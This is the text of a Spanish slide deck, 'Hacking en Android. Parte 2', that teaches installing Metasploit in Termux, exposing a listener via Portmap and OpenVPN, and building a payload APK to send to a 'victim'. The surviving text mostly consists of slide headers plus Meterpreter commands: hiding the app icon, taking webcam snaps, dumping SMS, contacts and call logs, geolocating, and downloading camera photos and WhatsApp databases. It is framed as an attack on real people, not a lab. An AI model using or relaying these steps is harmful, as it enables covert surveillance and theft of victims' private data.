Академический Документы
Профессиональный Документы
Культура Документы
Hacking en Android.
Parte 2
Metasploit y Portmap.
By Unknown
1
1
Contenido
Introducción 3
Metasploit Framework 5
Características principales 6
Instalando Metasploit en Termux 7
Portmap 12
¿Qué es Portmap? 13
Configurando Portmap 14
OpenVpn 28
¿Qué es OpenVpn? 28
Configurando OpenVpn 29
¡¡¡Manos a la obra!!! 34
¿Qué es un payload? 35
Creando nuestro propio Payload 37
¡Arrancando nuestro ataque! 50
2
3
Parte 2
Introducción
25/09/2019 Unknownlb 3
4 Parte 2
Metasploit Framework
25/09/2019 Unknownlb 4
5 Parte 2
Características principales
25/09/2019 Unknownlb
6 Parte 2
25/09/2019 Unknownlb 6
7 Parte 2
25/09/2019 Unknownlb 7
8 Parte 2
25/09/2019 Unknownlb 8
9 Parte 2
25/09/2019 Unknownlb 9
10 Parte 2
25/09/2019 Unknownlb 10
12 Parte 2
25/09/2019 Unknownlb 11
13 Parte 2
Portmap
¿Qué es Portmap?
25/09/2019 Unknownlb 12
14 Parte 2
Configurando Portmap
“portmap.io”
25/09/2019 Unknownlb 13
15 Parte 2
25/09/2019 Unknownlb 14
16 Parte 2
https://emailtemporal.org
25/09/2019 Unknownlb 15
17 Parte 2
25/09/2019 Unknownlb 16
18 Parte 2
25/09/2019 Unknownlb 17
19 Parte 2
25/09/2019 Unknownlb 18
20 Parte 2
25/09/2019 Unknownlb 19
21 Parte 2
25/09/2019 Unknownlb 20
22 Parte 2
25/09/2019 Unknownlb 21
23 Parte 2
25/09/2019 Unknownlb 22
24 Parte 2
25/09/2019 Unknownlb 23
25 Parte 2
25/09/2019 Unknownlb 24
26 Parte 2
25/09/2019 Unknownlb 25
27 Parte 2
25/09/2019 Unknownlb 26
28 Parte 2
OpenVpn
¿Qué es OpenVpn?
25/09/2019 Unknownlb 27
29 Parte 2
Configurando OpenVpn
25/09/2019 Unknownlb 28
30 Parte 2
25/09/2019 Unknownlb 29
31 Parte 2
25/09/2019 Unknownlb 30
32 Parte 2
25/09/2019 Unknownlb 31
33 Parte 2
25/09/2019 Unknownlb 32
34 Parte 2
¡¡¡Manos a la obra!!!
25/09/2019 Unknownlb 33
35 Parte 2
¿Qué es un payload?
25/09/2019 Unknownlb 34
36 Parte 2
25/09/2019 Unknownlb 35
37 Parte 2
25/09/2019 Unknownlb 36
38 Parte 2
“msfconsole”
25/09/2019 Unknownlb 37
39 Parte 2
25/09/2019 Unknownlb 38
40 Parte 2
25/09/2019 Unknownlb 39
41 Parte 2
25/09/2019 Unknownlb 40
42 Parte 2
25/09/2019 Unknownlb 41
43 Parte 2
25/09/2019 Unknownlb 42
44 Parte 2
25/09/2019 Unknownlb 43
45 Parte 2
“use multi/handler”
25/09/2019 Unknownlb 44
46 Parte 2
25/09/2019 Unknownlb 45
47 Parte 2
Y daremos enter.
25/09/2019 Unknownlb 46
48 Parte 2
25/09/2019 Unknownlb 47
49 Parte 2
25/09/2019 Unknownlb 48
50 Parte 2
Recomendación:
una vez que hemos puesto a Metasploit en modo
escucha, si pasa un lapso de tiempo mas o menos
prolongado, este expira la sesión y aunque la
victima instale nuestra apk mil veces, este no
nos mostrara nada, así que recomiendo que antes
de ponerlo en modo escucha, enviemos el apk a la
victima y nos aseguremos de que esta la va
instalar, así lo ponemos en modo escucha y no
esperaremos mas de 1 o 2 minutos hasta que la
víctima instale nuestra apk, lo que causara una
conexión exitosa entre Metasploit y el payload.
25/09/2019 Unknownlb 49
51 Parte 2
25/09/2019 Unknownlb 50
52 Parte 2
“run”
25/09/2019 Unknownlb 51
53 Parte 2
25/09/2019 Unknownlb 52
54 Parte 2
25/09/2019 Unknownlb 53
55 Parte 2
“hide_app_icon”
25/09/2019 Unknownlb 54
56 Parte 2
“sysinfo”
25/09/2019 Unknownlb 55
57 Parte 2
“webcam_snap”
25/09/2019 Unknownlb 56
58 Parte 2
“sms_dump”
25/09/2019 Unknownlb 57
59 Parte 2
“contacts_dump”
25/09/2019 Unknownlb 58
60 Parte 2
“calllog_dump”
25/09/2019 Unknownlb 59
61 Parte 2
“geolocate”
25/09/2019 Unknownlb 60
62 Parte 2
“shell”
25/09/2019 Unknownlb 61
63 Parte 2
25/09/2019 Unknownlb 62
64 Parte 2
“cd /sdcard”
“ls”
25/09/2019 Unknownlb 63
65 Parte 2
25/09/2019 Unknownlb 64
66 Parte 2
25/09/2019 Unknownlb 65
67 Parte 2
“exit”
Ejemplo:
“upload has_sido_hackeada_por_unknowns.txt
/sdcard”
25/09/2019 Unknownlb 66
68 Parte 2
25/09/2019 Unknownlb 67
69 Parte 2
“download /sdcard/DCIM/Camera”
“download /sdcard/WhatsApp/Databases”
25/09/2019 Unknownlb 68
70 Parte 2
“Ctrl + c”
O vamos a escribir:
“exit”
25/09/2019 Unknownlb 69
71 Parte 2
25/09/2019 Unknownlb 70
72 Parte 2
Ejemplo:
“cd Databases”
25/09/2019 Unknownlb 71
73 Parte 2
25/09/2019 Unknownlb 72
74 Parte 2
Ejemplo:
“cat sms_dump_20190922213815.txt”
25/09/2019 Unknownlb 73
74 Parte 2
Ejemplo:
“mv VnYwdcKz.jpg
/data/data/com.termux/files/home/storage/download
s”
25/09/2019 Unknownlb 74
75 Parte 2
25/09/2019 Unknownlb 75
76 Parte 2
Conclusión
25/09/2019 Unknownlb 76